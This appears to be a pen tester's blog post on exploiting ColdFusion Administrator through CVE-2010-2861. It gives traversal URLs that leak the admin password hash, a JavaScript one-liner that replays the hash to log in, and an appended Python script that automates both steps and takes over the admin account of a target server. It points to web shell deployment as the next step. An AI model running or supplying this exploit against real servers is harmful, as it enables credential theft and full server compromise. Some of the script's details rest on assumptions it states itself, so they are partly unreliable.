So this attack has been published for a while now and I just never posted about it, but I have still found it fruitful during pen tests. For that reason I wanted to collect all the information I have read and learned while performing this attack into one location for my reference.

The basic concept of this attack is a directory traversal (CVE-2010-2861) through the `locale` parameter of the ColdFusion Administrator that reads `password.properties`, the file holding the administrator password hash, which can then be used to log in to the server. Once you have admin on ColdFusion you can deploy a .cfm web shell through a ColdFusion scheduled task. If the ColdFusion service is running as administrator, it's game over. Adobe has released a patch for this attack, but I have seen this work on versions 7, 8 and 9 that have not been patched.

Step 1: Directory Traversal

This is the step where you will see whether the target is vulnerable or not. Below I have listed different strings to traverse; which one works depends on the version and install layout, since the number of `..\` segments and the install directory both vary. These are the ones I have found to work best for me. Let me know if you know of any others.

Single server configuration ColdFusion

http://site/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en

ColdFusion 7

http://site/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en

ColdFusion 8

http://site/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

ColdFusion 6, 7 and 8 (JRun4 multiserver layout)

http://site/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en

Step 2: Javascript:hex_hmac_sha1

Once you have the hash from password.properties you can either run it through rainbow tables (it is an unsalted SHA-1 of the admin password, so a wordlist attack works too) or use my preferred method, below. Copy the hash, go back to the login screen, paste the hash into the password field, then paste the following JavaScript into the address bar and execute it.

javascript:hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value)

This will return another value: the HMAC-SHA1 of the hash keyed with the form's salt, which is what the login form actually submits as the password (the normal login JavaScript does the same thing to the SHA-1 of whatever you type, which is why the stored hash can simply be replayed). This all has to be done pretty fast. The salt seems to be good for 30 seconds or less before this value times out. Sometimes cookies will have to be cleared and you will have to rerun the JavaScript.

So with this value you just have to intercept the login with a proxy and replace the cfadminPassword parameter with it. If all goes well you should be rewarded with a nice admin screen. Now do what you would like; I like web shells.
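The two steps above, scripted end to end, as an added example that is not from the original post: step 1 tries each traversal string and pulls the password.properties lines out of the leaked page, step 2 reproduces the `hex_hmac_sha1(salt, hash)` value and submits it before the salt expires. Everything not in the post is an assumption and is marked as such in the code: the login form posting to `enter.cfm` with the fields `cfadminUserId`, `cfadminPassword`, `salt` and `requestedURL`, the salt being a numeric timestamp, the server-side check modelled in `verify_login`, and the constructed sample response used for offline testing.

```python
#!/usr/bin/env python3
"""Added example: automate the CVE-2010-2861 traversal and pass-the-hash login.

Not from the original post. Assumed: login posts to enter.cfm with fields
cfadminUserId/cfadminPassword/salt/requestedURL, the salt is a numeric
timestamp, and the server accepts it for roughly 30 s (the post's observation).
"""
import hashlib
import hmac
import http.cookiejar
import re
import ssl
import sys
import urllib.error
import urllib.parse
import urllib.request

# Traversal strings from the post. Depth and install directory vary by version,
# so each is tried in turn. They are sent raw so %00 and the backslashes arrive untouched.
TRAVERSALS = [
    r"..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en",
    r"..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en",
    r"..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en",
    r"..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war"
    r"\WEB-INF\cfusion\lib\password.properties%00en",
]
PROP_RE = re.compile(r"^\s*(rdspassword|password|encrypted)=(.*?)\s*$", re.M)
SALT_RE = re.compile(r'<input[^>]*name="?salt"?[^>]*value="?(\d+)', re.I)  # assumed layout
SALT_WINDOW_MS = 30_000  # lifetime of a salt as observed in the post

# Constructed sample of a leaked settings.cfm response, for offline testing only.
SAMPLE_RESPONSE = ("<html><body>#Wed Aug 11 17:16:30 PDT 2010\r\nrdspassword=0IA/FZJEIEF=\r\n"
                   "password=5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8\r\nencrypted=true\r\n</body></html>")


def parse_password_properties(body):
    """Extract the rdspassword/password/encrypted lines from a leaked response body."""
    return dict(PROP_RE.findall(body))


def admin_hash(props):
    """40-hex SHA-1 the login JavaScript feeds into the HMAC. With encrypted=false the
    file holds the plaintext password, so hash it as the page's hex_sha1() would."""
    pw = props.get("password")
    if pw is None:
        return None
    if props.get("encrypted", "true").lower() == "false":
        return hashlib.sha1(pw.encode()).hexdigest()
    return pw.lower()


def login_token(salt, hash_hex):
    """Same value as javascript:hex_hmac_sha1(salt, hash): HMAC-SHA1 keyed with the salt."""
    return hmac.new(salt.encode(), hash_hex.encode(), hashlib.sha1).hexdigest()


def verify_login(salt, token, stored_hash, now_ms):
    """Assumed model of the server check: salt must be recent, token must match the HMAC."""
    if abs(now_ms - int(salt)) > SALT_WINDOW_MS:
        return False
    return hmac.compare_digest(token, login_token(salt, stored_hash))


def make_opener():
    """Cookie-aware opener that tolerates the self-signed certs CF admin often has."""
    ctx = ssl.create_default_context()
    ctx.check_hostname, ctx.verify_mode = False, ssl.CERT_NONE
    return urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()),
        urllib.request.HTTPSHandler(context=ctx))


def fetch(opener, url, data=None, timeout=10):
    """GET (or POST form data). Error pages are returned too; the leak often comes back non-200."""
    body = urllib.parse.urlencode(data).encode() if data else None
    try:
        with opener.open(url, data=body, timeout=timeout) as r:
            return r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.read().decode("utf-8", "replace")


def leak(base, opener):
    """Step 1: try every traversal; return (traversal, props) on the first hit, else None."""
    for trav in TRAVERSALS:
        props = parse_password_properties(
            fetch(opener, f"{base}/CFIDE/administrator/logging/settings.cfm?locale={trav}"))
        if "password" in props:
            return trav, props
    return None


def pass_the_hash(base, hash_hex, opener):
    """Step 2: grab a fresh salt, compute the token and submit it before it expires."""
    m = SALT_RE.search(fetch(opener, f"{base}/CFIDE/administrator/"))
    if not m:
        raise RuntimeError("no salt field found on the login page")
    form = {"cfadminUserId": "admin", "cfadminPassword": login_token(m.group(1), hash_hex),
            "requestedURL": f"{base}/CFIDE/administrator/", "salt": m.group(1), "submit": "Login"}
    return fetch(opener, f"{base}/CFIDE/administrator/enter.cfm", form)


if __name__ == "__main__":
    base, op = sys.argv[1].rstrip("/"), make_opener()  # usage: script.py http://site
    hit = leak(base, op) or sys.exit("no traversal leaked password.properties")
    print(f"[+] {hit[0]}\n    {hit[1]}")
    resp = pass_the_hash(base, admin_hash(hit[1]), op)
    print("[+] logged in" if "Logout" in resp else "[-] login failed, inspect response")  # crude, assumed
```

Run it against the target base URL; the cookie jar carries the session so the post-login response can be reused for the scheduled-task web shell step. `verify_login` is only a local model of the timing check, useful for seeing why a stale salt is rejected and why the JavaScript sometimes has to be rerun.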

References:

http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07